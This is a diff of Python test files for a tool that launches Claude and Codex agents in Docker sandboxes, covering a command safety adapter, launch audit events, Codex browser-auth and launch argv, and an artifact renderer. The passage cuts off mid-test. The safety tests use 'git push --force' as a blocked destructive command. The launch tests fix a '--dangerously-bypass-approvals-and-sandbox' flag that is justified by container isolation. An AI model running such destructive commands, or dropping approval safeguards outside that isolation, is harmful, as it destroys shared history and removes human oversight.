kind=ArtifactKind.MCP_SERVER, + source_url="https://portable.example.com", + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + mcp = result.settings_fragment["mcpServers"] + assert "bound-mcp" in mcp + assert "portable-mcp" in mcp + assert mcp["bound-mcp"]["url"] == "https://bound.example.com" + assert mcp["portable-mcp"]["url"] == "https://portable.example.com" diff --git a/tests/test_claude_safety_adapter.py b/tests/test_claude_safety_adapter.py new file mode 100644 index 0000000..c63b956 --- /dev/null +++ b/tests/test_claude_safety_adapter.py @@ -0,0 +1,93 @@ +"""Unit tests for ClaudeSafetyAdapter.""" + +from __future__ import annotations + +from scc_cli.adapters.claude_safety_adapter import ClaudeSafetyAdapter +from scc_cli.core.contracts import SafetyPolicy, SafetyVerdict +from scc_cli.core.enums import SeverityLevel +from tests.fakes import FakeAuditEventSink +from tests.fakes.fake_safety_engine import FakeSafetyEngine + +_POLICY = SafetyPolicy() + + +def _make_adapter( + verdict: SafetyVerdict | None = None, +) -> tuple[ClaudeSafetyAdapter, FakeSafetyEngine, FakeAuditEventSink]: + engine = FakeSafetyEngine() + if verdict is not None: + engine.verdict = verdict + sink = FakeAuditEventSink() + return ClaudeSafetyAdapter(engine=engine, audit_sink=sink), engine, sink + + +class TestCheckCommandDelegatesToEngine: + def test_check_command_delegates_to_engine(self) -> None: + adapter, engine, _sink = _make_adapter() + adapter.check_command("git push --force", _POLICY) + + assert len(engine.calls) == 1 + cmd, policy = engine.calls[0] + assert cmd == "git push --force" + assert policy is _POLICY + + +class TestBlockedCommandEmitsWarningAuditEvent: + def test_blocked_command_emits_warning_audit_event(self) -> None: + blocked = SafetyVerdict( + allowed=False, + reason="destructive git operation", + matched_rule="force-push", + command_family="destructive-git", + ) + adapter, _engine, sink = _make_adapter(verdict=blocked) + adapter.check_command("git push --force", _POLICY) + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.severity == SeverityLevel.WARNING + assert event.event_type == "safety.check" + assert event.subject == "claude" + assert event.metadata["provider_id"] == "claude" + assert event.metadata["command"] == "git push --force" + assert event.metadata["verdict_allowed"] == "false" + assert event.metadata["matched_rule"] == "force-push" + assert event.metadata["command_family"] == "destructive-git" + + +class TestAllowedCommandEmitsInfoAuditEvent: + def test_allowed_command_emits_info_audit_event(self) -> None: + adapter, _engine, sink = _make_adapter() + adapter.check_command("ls -la", _POLICY) + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.severity == SeverityLevel.INFO + assert event.metadata["verdict_allowed"] == "true" + assert event.metadata["matched_rule"] == "" + assert event.metadata["command_family"] == "" + + +class TestBlockedUserMessageFormat: + def test_blocked_user_message_format(self) -> None: + blocked = SafetyVerdict(allowed=False, reason="destructive git operation") + adapter, _engine, _sink = _make_adapter(verdict=blocked) + result = adapter.check_command("git push --force", _POLICY) + + assert result.user_message == "[Claude] Command blocked: destructive git operation" + + +class TestAllowedUserMessageFormat: + def test_allowed_user_message_format(self) -> None: + adapter, _engine, _sink = _make_adapter() + result = adapter.check_command("ls -la", _POLICY) + + assert result.user_message == "[Claude] Command allowed" + + +class TestAuditEmittedFlagIsTrue: + def test_audit_emitted_flag_is_true(self) -> None: + adapter, _engine, _sink = _make_adapter() + result = adapter.check_command("echo hello", _POLICY) + + assert result.audit_emitted is True diff --git a/tests/test_cli.py b/tests/test_cli.py index 97e3990..defcde6 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -26,7 +26,8 @@ from scc_cli.core.exit_codes import EXIT_USAGE from scc_cli.ports.dependency_installer import DependencyInstallResult from scc_cli.ports.session_models import SessionSummary -from tests.fakes import build_fake_adapters +from tests.fakes import FakeAuditEventSink, build_fake_adapters +from tests.fakes.fake_agent_provider import FakeAgentProvider runner = CliRunner() @@ -148,11 +149,14 @@ def test_start_with_install_deps_runs_dependency_install(self, tmp_path): remote_fetcher=base_adapters.remote_fetcher, clock=base_adapters.clock, agent_runner=base_adapters.agent_runner, + agent_provider=base_adapters.agent_provider, sandbox_runtime=base_adapters.sandbox_runtime, personal_profile_service=base_adapters.personal_profile_service, doctor_runner=base_adapters.doctor_runner, archive_writer=base_adapters.archive_writer, config_store=base_adapters.config_store, + audit_event_sink=base_adapters.audit_event_sink, + codex_agent_provider=FakeAgentProvider(), ) with ( @@ -210,6 +214,78 @@ def test_start_with_standalone_skips_org_config(self, tmp_path): # Should NOT have called load_org_config mock_remote.assert_not_called() + def test_start_appends_canonical_launch_audit_events(self, tmp_path): + """Direct start should emit shared preflight and launch events.""" + fake_adapters = build_fake_adapters() + + with ( + patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), + patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow.get_default_adapters", return_value=fake_adapters), + patch( + "scc_cli.commands.launch.flow.resolve_launch_provider", + return_value=("claude", "explicit"), + ), + patch( + "scc_cli.commands.launch.flow.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), + ), + patch("scc_cli.commands.launch.workspace.check_branch_safety"), + ): + result = runner.invoke(app, ["start", str(tmp_path), "--standalone"]) + + assert result.exit_code == 0 + assert isinstance(fake_adapters.audit_event_sink, FakeAuditEventSink) + sink = fake_adapters.audit_event_sink + assert [event.event_type for event in sink.events] == [ + "launch.preflight.passed", + "launch.started", + ] + assert sink.events[0].metadata["provider_id"] == "fake" + assert sink.events[0].metadata["network_policy"] == "open" + assert sink.events[1].metadata["sandbox_id"] == "sandbox-1" + + def test_start_returns_json_error_when_preflight_blocks_runtime(self, tmp_path): + """Direct start should fail before runtime start and keep JSON error rendering.""" + from scc_cli.application.compute_effective_config import EffectiveConfig + + fake_adapters = build_fake_adapters() + + with ( + patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), + patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow._configure_team_settings"), + patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), + patch("scc_cli.commands.launch.flow.get_default_adapters", return_value=fake_adapters), + patch( + "scc_cli.commands.launch.flow.resolve_launch_provider", + return_value=("claude", "explicit"), + ), + patch( + "scc_cli.commands.launch.flow.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), + ), + patch("scc_cli.commands.launch.workspace.check_branch_safety"), + patch( + "scc_cli.application.start_session.compute_effective_config", + return_value=EffectiveConfig(network_policy="locked-down-web"), + ), + patch( + "scc_cli.application.start_session.sync_marketplace_settings_for_start", + return_value=(None, None), + ), + ): + result = runner.invoke(app, ["start", str(tmp_path), "--team", "platform", "--json"]) + + assert result.exit_code != 0 + assert fake_adapters.sandbox_runtime.list_running() == [] + assert isinstance(fake_adapters.audit_event_sink, FakeAuditEventSink) + assert [event.event_type for event in fake_adapters.audit_event_sink.events] == [ + "launch.preflight.failed" + ] + assert "Launch blocked before startup" in result.output + assert "locked-down-web" in result.output + # ═══════════════════════════════════════════════════════════════════════════════ # Tests for worktree command options @@ -566,7 +642,7 @@ def test_stop_stops_container(self): with ( patch( - "scc_cli.commands.worktree.container_commands.docker.list_running_sandboxes", + "scc_cli.commands.worktree.container_commands.docker.list_running_scc_containers", return_value=[mock_container], ), patch( @@ -587,7 +663,7 @@ def test_stop_nonexistent_container_shows_error(self): mock_container.id = "other123" with patch( - "scc_cli.commands.worktree.container_commands.docker.list_running_sandboxes", + "scc_cli.commands.worktree.container_commands.docker.list_running_scc_containers", return_value=[mock_container], ): result = runner.invoke(app, ["stop", "nonexistent"]) @@ -598,7 +674,7 @@ def test_stop_nonexistent_container_shows_error(self): def test_stop_all_when_no_containers(self): """Stop should show message when no containers running.""" with patch( - "scc_cli.commands.worktree.container_commands.docker.list_running_sandboxes", + "scc_cli.commands.worktree.container_commands.docker.list_running_scc_containers", return_value=[], ): result = runner.invoke(app, ["stop"]) diff --git a/tests/test_cli_org_import.py b/tests/test_cli_org_import.py index f2ea608..ec6fd4b 100644 --- a/tests/test_cli_org_import.py +++ b/tests/test_cli_org_import.py @@ -42,7 +42,7 @@ def valid_org_config() -> dict: }, "defaults": { "allowed_plugins": ["code-review", "linter"], - "network_policy": "unrestricted", + "network_policy": "open", }, "profiles": { "base": {"description": "Default profile"}, diff --git a/tests/test_cli_setup.py b/tests/test_cli_setup.py index 9b97e75..e1fbabf 100644 --- a/tests/test_cli_setup.py +++ b/tests/test_cli_setup.py @@ -59,6 +59,7 @@ def test_org_flag_resolves_github_shorthand( return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke( @@ -84,6 +85,7 @@ def test_org_flag_accepts_direct_url( return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke( @@ -135,6 +137,7 @@ def test_profile_flag_selects_profile( return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke( @@ -159,6 +162,7 @@ def test_team_flag_still_works(self, cli_runner: CliRunner, sample_org_config: d return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke( @@ -184,6 +188,7 @@ def test_profile_takes_precedence_over_team( return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), patch("scc_cli.setup.run_non_interactive_setup") as mock_run, ): @@ -227,6 +232,7 @@ def test_org_url_flag_still_works(self, cli_runner: CliRunner, sample_org_config return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke( @@ -261,6 +267,7 @@ def test_org_takes_precedence_over_org_url( return_value=sample_org_config, ), patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke( @@ -293,6 +300,7 @@ def test_standalone_ignores_org_flag(self, cli_runner: CliRunner) -> None: with ( patch("scc_cli.setup.save_setup_config"), + patch("scc_cli.setup._run_provider_onboarding", return_value=(None, None)), patch("scc_cli.setup.show_setup_complete"), ): result = cli_runner.invoke(app, ["setup", "--standalone"]) diff --git a/tests/test_codex_agent_provider.py b/tests/test_codex_agent_provider.py new file mode 100644 index 0000000..ef31cb7 --- /dev/null +++ b/tests/test_codex_agent_provider.py @@ -0,0 +1,236 @@ +"""Characterization tests for CodexAgentProvider. + +These tests pin the exact AgentLaunchSpec shape that CodexAgentProvider +produces so that regressions in the adapter seam are caught immediately. +""" + +from __future__ import annotations + +import json +import subprocess +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters.codex_agent_provider import CodexAgentProvider +from scc_cli.adapters.codex_launch import build_codex_container_argv +from scc_cli.core.contracts import AuthReadiness +from scc_cli.core.errors import ProviderNotReadyError + +# ═══════════════════════════════════════════════════════════════════════════════ +# Fixtures +# ═══════════════════════════════════════════════════════════════════════════════ + + +@pytest.fixture() +def provider() -> CodexAgentProvider: + return CodexAgentProvider() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# capability_profile +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_capability_profile_returns_codex_metadata(provider: CodexAgentProvider) -> None: + """capability_profile() must return the stable Codex provider metadata.""" + profile = provider.capability_profile() + + assert profile.provider_id == "codex" + assert profile.display_name == "Codex" + assert profile.required_destination_set == "openai-core" + assert profile.supports_resume is False + + +# ═══════════════════════════════════════════════════════════════════════════════ +# prepare_launch — without settings_path +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_prepare_launch_without_settings_produces_clean_spec( + provider: CodexAgentProvider, tmp_path: Path +) -> None: + """No settings_path → artifact_paths is empty, env is empty, argv is canonical.""" + spec = provider.prepare_launch(config={}, workspace=tmp_path, settings_path=None) + + assert spec.provider_id == "codex" + assert spec.argv == build_codex_container_argv() + assert spec.env == {} + assert spec.artifact_paths == () + assert spec.required_destination_sets == ("openai-core",) + assert spec.workdir == tmp_path + + +# ═══════════════════════════════════════════════════════════════════════════════ +# prepare_launch — with settings_path +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_prepare_launch_with_settings_includes_artifact_path( + provider: CodexAgentProvider, tmp_path: Path +) -> None: + """settings_path present → it appears in artifact_paths; env stays empty.""" + fake_settings = tmp_path / "codex-settings.json" + fake_settings.write_text("{}") + + spec = provider.prepare_launch(config={}, workspace=tmp_path, settings_path=fake_settings) + + assert fake_settings in spec.artifact_paths + assert spec.env == {} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# prepare_launch — env contract (D003 / KNOWLEDGE.md) +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_prepare_launch_env_is_clean_str_to_str( + provider: CodexAgentProvider, tmp_path: Path +) -> None: + """All env values must be plain str, never nested dicts (D003 contract).""" + spec = provider.prepare_launch(config={"key": "value"}, workspace=tmp_path) + + for key, val in spec.env.items(): + assert isinstance(key, str), f"env key {key!r} is not str" + assert isinstance(val, str), f"env value for {key!r} is not str: {val!r}" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# auth_check — D037: adapter-owned auth readiness +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _mock_docker_run_codex( + *, + volume_rc: int = 0, + cat_rc: int = 0, + cat_stdout: bytes = b'{"token":"xyz"}', + volume_exc: Exception | None = None, + cat_exc: Exception | None = None, +) -> MagicMock: + """Route subprocess.run by Docker subcommand for Codex auth checks.""" + + def _side_effect(cmd: list[str], **_kw: object) -> subprocess.CompletedProcess[bytes]: + if "volume" in cmd and "inspect" in cmd: + if volume_exc is not None: + raise volume_exc + return subprocess.CompletedProcess(cmd, volume_rc, b"", b"") + if "cat" in cmd: + if cat_exc is not None: + raise cat_exc + return subprocess.CompletedProcess(cmd, cat_rc, cat_stdout, b"") + return subprocess.CompletedProcess(cmd, 0, b"", b"") + + return MagicMock(side_effect=_side_effect) + + +class TestCodexAuthCheck: + """auth_check() validates Codex auth.json credential presence (D037).""" + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_auth_present_valid_json( + self, mock_run: MagicMock, provider: CodexAgentProvider + ) -> None: + mock_run.side_effect = _mock_docker_run_codex( + cat_stdout=json.dumps({"api_key": "sk-abc"}).encode() + ).side_effect + result = provider.auth_check() + assert result.status == "present" + assert result.mechanism == "auth_json_file" + assert "auth cache present" in result.guidance + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_auth_file_missing(self, mock_run: MagicMock, provider: CodexAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_codex(cat_rc=1).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "auth.json" in result.guidance + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_auth_file_empty(self, mock_run: MagicMock, provider: CodexAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_codex(cat_stdout=b"").side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "empty" in result.guidance + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_auth_file_invalid_json( + self, mock_run: MagicMock, provider: CodexAgentProvider + ) -> None: + mock_run.side_effect = _mock_docker_run_codex( + cat_stdout=b"corrupt-data!!!", + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "invalid JSON" in result.guidance + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_volume_missing(self, mock_run: MagicMock, provider: CodexAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_codex(volume_rc=1).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "scc start" in result.guidance + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_docker_not_reachable(self, mock_run: MagicMock, provider: CodexAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_codex( + volume_exc=FileNotFoundError("docker not found") + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "Cannot reach Docker" in result.guidance + + @patch("scc_cli.adapters.codex_agent_provider.subprocess.run") + def test_cat_timeout(self, mock_run: MagicMock, provider: CodexAgentProvider) -> None: + mock_run.side_effect = _mock_docker_run_codex( + cat_exc=subprocess.TimeoutExpired(cmd=["docker"], timeout=30) + ).side_effect + result = provider.auth_check() + assert result.status == "missing" + assert "Timed out" in result.guidance + + +class TestCodexBootstrapAuth: + """bootstrap_auth() uses browser auth and confirms cache presence afterwards.""" + + @patch("scc_cli.adapters.codex_agent_provider.run_codex_browser_auth") + def test_bootstrap_auth_succeeds_when_auth_cache_becomes_present( + self, + mock_browser_auth: MagicMock, + provider: CodexAgentProvider, + ) -> None: + mock_browser_auth.return_value = 0 + with patch.object( + provider, + "auth_check", + return_value=AuthReadiness( + status="present", + mechanism="auth_json_file", + guidance="Codex auth cache present — no action needed", + ), + ): + provider.bootstrap_auth() + + mock_browser_auth.assert_called_once() + + @patch("scc_cli.adapters.codex_agent_provider.run_codex_browser_auth") + def test_bootstrap_auth_raises_when_cache_still_missing( + self, + mock_browser_auth: MagicMock, + provider: CodexAgentProvider, + ) -> None: + mock_browser_auth.return_value = 1 + with patch.object( + provider, + "auth_check", + return_value=AuthReadiness( + status="missing", + mechanism="auth_json_file", + guidance="Auth cache still missing", + ), + ): + with pytest.raises(ProviderNotReadyError): + provider.bootstrap_auth() + + mock_browser_auth.assert_called_once() diff --git a/tests/test_codex_agent_runner.py b/tests/test_codex_agent_runner.py new file mode 100644 index 0000000..b184775 --- /dev/null +++ b/tests/test_codex_agent_runner.py @@ -0,0 +1,119 @@ +"""Tests for CodexAgentRunner adapter.""" + +from __future__ import annotations + +import importlib +from pathlib import Path + +from scc_cli.adapters.codex_agent_runner import DEFAULT_SETTINGS_PATH, CodexAgentRunner +from scc_cli.adapters.codex_launch import build_codex_container_argv + +tomllib = importlib.import_module("tomllib") + + +class TestCodexAgentRunner: + """Canonical 4-test shape for CodexAgentRunner.""" + + def test_build_settings_returns_codex_path(self) -> None: + runner = CodexAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + assert settings.path == Path("/home/agent/.codex/config.toml") + assert settings.suffix == ".toml" + + def test_build_settings_renders_toml_bytes(self) -> None: + """D035: runner serialises config to TOML, not dict passthrough.""" + runner = CodexAgentRunner() + config = {"cli_auth_credentials_store": "file", "model": "o3"} + settings = runner.build_settings(config, path=DEFAULT_SETTINGS_PATH) + assert isinstance(settings.rendered_bytes, bytes) + # Verify it's valid TOML by round-tripping through tomllib + parsed = tomllib.loads(settings.rendered_bytes.decode()) + assert parsed["cli_auth_credentials_store"] == "file" + assert parsed["model"] == "o3" + + def test_build_settings_renders_nested_toml(self) -> None: + """TOML sections for nested dicts.""" + runner = CodexAgentRunner() + config = {"sandbox": {"auto_approve": True}, "model": "o3"} + settings = runner.build_settings(config, path=DEFAULT_SETTINGS_PATH) + parsed = tomllib.loads(settings.rendered_bytes.decode()) + assert parsed["model"] == "o3" + assert parsed["sandbox"]["auto_approve"] is True + + def test_build_command_returns_codex_argv(self) -> None: + runner = CodexAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + command = runner.build_command(settings) + assert command.argv[0] == "codex" + # D033: must include bypass flag for container-level sandbox deferral + assert "--dangerously-bypass-approvals-and-sandbox" in " ".join(command.argv) + # Claude-style flag must NOT appear + assert "--dangerously-skip-permissions" not in command.argv + + def test_build_command_includes_d033_bypass_flag(self) -> None: + """D033: Codex launched with --dangerously-bypass-approvals-and-sandbox. + + SCC's container isolation is the hard boundary; Codex's OS-level + sandbox is redundant inside Docker and may interfere. + """ + runner = CodexAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + command = runner.build_command(settings) + assert command.argv == list(build_codex_container_argv()) + + def test_describe_returns_codex(self) -> None: + runner = CodexAgentRunner() + assert runner.describe() == "Codex" + + def test_env_is_clean_str_to_str(self) -> None: + """D003 contract guard: env dict must be empty str→str.""" + runner = CodexAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + command = runner.build_command(settings) + assert command.env == {} + assert isinstance(command.env, dict) + + +class TestD040FileBasedAuth: + """D040: SCC always injects cli_auth_credentials_store='file' for Codex.""" + + def test_empty_config_gets_file_auth_store(self) -> None: + """Even with no caller config, file-based auth is present.""" + runner = CodexAgentRunner() + settings = runner.build_settings({}, path=DEFAULT_SETTINGS_PATH) + parsed = tomllib.loads(settings.rendered_bytes.decode()) + assert parsed["cli_auth_credentials_store"] == "file" + + def test_caller_config_preserved_alongside_auth_store(self) -> None: + """Caller-supplied keys merge with SCC-managed defaults.""" + runner = CodexAgentRunner() + config = {"model": "o3", "history": True} + settings = runner.build_settings(config, path=DEFAULT_SETTINGS_PATH) + parsed = tomllib.loads(settings.rendered_bytes.decode()) + assert parsed["cli_auth_credentials_store"] == "file" + assert parsed["model"] == "o3" + assert parsed["history"] is True + + def test_explicit_override_takes_precedence(self) -> None: + """If governed config explicitly sets a different store, it wins.""" + runner = CodexAgentRunner() + config = {"cli_auth_credentials_store": "keyring"} + settings = runner.build_settings(config, path=DEFAULT_SETTINGS_PATH) + parsed = tomllib.loads(settings.rendered_bytes.decode()) + # Caller-supplied value overrides the SCC default + assert parsed["cli_auth_credentials_store"] == "keyring" + + def test_auth_json_path_in_persistent_volume(self) -> None: + """Auth.json lives in the persistent provider volume at /home/agent/.codex/. + + The data_volume (docker-codex-sandbox-data) is mounted to + /home/agent/.codex, so auth.json persists across container restarts. + """ + from scc_cli.core.provider_registry import get_runtime_spec + + spec = get_runtime_spec("codex") + # The data volume mounts to /home/agent/ → /home/agent/.codex + auth_path = Path("/home/agent") / spec.config_dir / "auth.json" + assert auth_path == Path("/home/agent/.codex/auth.json") + # The volume name is stable across launches + assert spec.data_volume == "docker-codex-sandbox-data" diff --git a/tests/test_codex_launch.py b/tests/test_codex_launch.py new file mode 100644 index 0000000..94a150b --- /dev/null +++ b/tests/test_codex_launch.py @@ -0,0 +1,100 @@ +"""Tests for Codex launch and browser-auth bootstrap helpers.""" + +from __future__ import annotations + +import subprocess +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters.codex_auth import ( + AUTH_CALLBACK_PORT, + AUTH_RELAY_PORT, + build_codex_browser_auth_command, + run_codex_browser_auth, +) +from scc_cli.adapters.codex_launch import build_codex_container_argv +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.provider_registry import get_runtime_spec + + +def test_build_codex_container_argv_is_plain_codex_launch() -> None: + """The steady-state container argv is just the Codex TUI plus SCC bypass.""" + assert build_codex_container_argv() == ( + "codex", + "--dangerously-bypass-approvals-and-sandbox", + ) + + +def test_build_codex_browser_auth_command_uses_published_callback_port() -> None: + """Browser auth runs through a relay that exposes Codex's loopback callback.""" + spec = get_runtime_spec("codex") + + assert build_codex_browser_auth_command() == [ + "docker", + "run", + "--rm", + "-it", + "--entrypoint", + "/bin/sh", + "-p", + f"127.0.0.1:{AUTH_CALLBACK_PORT}:{AUTH_RELAY_PORT}", + "-v", + f"{spec.data_volume}:/home/agent/{spec.config_dir}", + "-w", + "/home/agent", + spec.image_ref, + "-lc", + ( + "socat TCP-LISTEN:1456,bind=0.0.0.0,reuseaddr,fork " + "TCP:127.0.0.1:1455 & " + "exec codex login -c cli_auth_credentials_store=file" + ), + ] + + +@patch("scc_cli.adapters.codex_auth.subprocess.run") +@patch("scc_cli.adapters.codex_auth._is_local_callback_port_available", return_value=True) +def test_run_codex_browser_auth_executes_docker_login( + mock_port_available: MagicMock, + mock_run: MagicMock, +) -> None: + """Successful browser bootstrap executes the temporary Docker login flow.""" + mock_run.return_value = subprocess.CompletedProcess(["docker"], 0) + + return_code = run_codex_browser_auth() + + mock_port_available.assert_called_once_with(AUTH_CALLBACK_PORT) + assert mock_run.call_args.args[0] == build_codex_browser_auth_command() + assert return_code == 0 + + +@patch("scc_cli.adapters.codex_auth.subprocess.run") +@patch("scc_cli.adapters.codex_auth._is_local_callback_port_available", return_value=False) +def test_run_codex_browser_auth_fails_cleanly_when_callback_port_busy( + mock_port_available: MagicMock, + mock_run: MagicMock, +) -> None: + """Port 1455 conflicts fail with actionable SCC guidance before Docker runs.""" + with pytest.raises(ProviderNotReadyError) as exc_info: + run_codex_browser_auth() + + mock_port_available.assert_called_once_with(AUTH_CALLBACK_PORT) + mock_run.assert_not_called() + assert "localhost:1455" in str(exc_info.value) + assert "device-code" in exc_info.value.suggested_action.lower() + + +@patch("scc_cli.adapters.codex_auth.subprocess.run") +@patch("scc_cli.adapters.codex_auth._is_local_callback_port_available", return_value=True) +def test_run_codex_browser_auth_surfaces_login_failure( + mock_port_available: MagicMock, + mock_run: MagicMock, +) -> None: + """Non-zero login exits are returned for provider-owned confirmation.""" + mock_run.return_value = subprocess.CompletedProcess(["docker"], 1) + + return_code = run_codex_browser_auth() + mock_port_available.assert_called_once_with(AUTH_CALLBACK_PORT) + mock_run.assert_called_once() + assert return_code == 1 diff --git a/tests/test_codex_renderer.py b/tests/test_codex_renderer.py new file mode 100644 index 0000000..2fe1df7 --- /dev/null +++ b/tests/test_codex_renderer.py @@ -0,0 +1,1767 @@ +"""Characterization tests for the Codex renderer. + +Verifies that render_codex_artifacts() produces expected file structures +and MCP fragments from known ArtifactRenderPlans. + +Covers: +- Empty plan → empty result +- Skill binding → skill metadata file under .agents/skills/ +- MCP server binding (SSE/HTTP/stdio) → mcpServers MCP fragment +- Native integration binding (plugin_bundle, rules, hooks, instructions) +- Mixed bundle with multiple binding types +- Plan targeting wrong provider → skip with warning +- Non-codex binding in plan → skip with warning +- Empty native_ref on skill → warning +- Missing URL on MCP SSE → warning +- Missing command on MCP stdio → warning +- MCP audit file written for non-empty fragments +- Hooks merge strategy (existing file preserved) +- Deterministic/idempotent rendering (same plan → same output) +- Return type shape +""" + +from __future__ import annotations + +import json +from pathlib import Path + +import pytest + +from scc_cli.adapters.codex_renderer import ( + CODEX_CONFIG_DIR, + CODEX_PLUGIN_DIR, + CODEX_RULES_DIR, + INSTRUCTIONS_SUBDIR, + SCC_MANAGED_DIR, + SCC_SECTION_END, + SCC_SECTION_START, + SKILLS_DIR, + RendererResult, + _classify_binding, + _render_mcp_binding, + _render_native_integration_binding, + _render_skill_binding, + render_codex_artifacts, +) +from scc_cli.core.errors import MaterializationError, MergeConflictError +from scc_cli.core.governed_artifacts import ( + ArtifactKind, + ArtifactRenderPlan, + PortableArtifact, + ProviderArtifactBinding, +) + +# --------------------------------------------------------------------------- +# Fixtures +# --------------------------------------------------------------------------- + + +@pytest.fixture() +def workspace(tmp_path: Path) -> Path: + """Return a fresh temporary workspace directory.""" + return tmp_path + + +def _plan( + *, + bundle_id: str = "test-bundle", + provider: str = "codex", + bindings: tuple[ProviderArtifactBinding, ...] = (), + skipped: tuple[str, ...] = (), + effective_artifacts: tuple[str, ...] = (), + portable_artifacts: tuple[PortableArtifact, ...] = (), +) -> ArtifactRenderPlan: + return ArtifactRenderPlan( + bundle_id=bundle_id, + provider=provider, + bindings=bindings, + skipped=skipped, + effective_artifacts=effective_artifacts, + portable_artifacts=portable_artifacts, + ) + + +# --------------------------------------------------------------------------- +# Empty / trivial +# --------------------------------------------------------------------------- + + +class TestEmptyPlan: + def test_empty_plan_produces_empty_result(self, workspace: Path) -> None: + result = render_codex_artifacts(_plan(), workspace) + assert isinstance(result, RendererResult) + assert result.rendered_paths == () + assert result.skipped_artifacts == () + assert result.warnings == () + assert result.mcp_fragment == {} + + def test_empty_bindings_with_skipped(self, workspace: Path) -> None: + plan = _plan(skipped=("ghost-artifact",)) + result = render_codex_artifacts(plan, workspace) + assert result.skipped_artifacts == ("ghost-artifact",) + assert result.rendered_paths == () + + +# --------------------------------------------------------------------------- +# Wrong provider +# --------------------------------------------------------------------------- + + +class TestWrongProvider: + def test_non_codex_provider_produces_warning(self, workspace: Path) -> None: + plan = _plan(provider="claude", effective_artifacts=("some-skill",)) + result = render_codex_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "claude" in result.warnings[0] + assert "nothing rendered" in result.warnings[0] + assert result.skipped_artifacts == ("some-skill",) + + def test_non_codex_binding_in_codex_plan(self, workspace: Path) -> None: + plan = _plan( + bindings=(ProviderArtifactBinding(provider="claude", native_ref="skills/foo"),), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "claude" in result.warnings[0] + + +# --------------------------------------------------------------------------- +# Skill binding +# --------------------------------------------------------------------------- + + +class TestSkillBinding: + def test_skill_creates_metadata_file(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/code-review", + ), + ), + effective_artifacts=("code-review-skill",), + ) + result = render_codex_artifacts(plan, workspace) + + assert result.warnings == () + assert len(result.rendered_paths) >= 1 + + # Check the skill metadata file exists under .agents/skills/ + skill_dir = workspace / SKILLS_DIR / "skills_code-review" + metadata_path = skill_dir / "skill.json" + assert metadata_path.exists() + + content = json.loads(metadata_path.read_text()) + assert content["native_ref"] == "skills/code-review" + assert content["provider"] == "codex" + assert content["bundle_id"] == "test-bundle" + assert content["managed_by"] == "scc" + + def test_skill_with_native_config(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/review", + native_config={"priority": "high"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + skill_dir = workspace / SKILLS_DIR / "skills_review" + content = 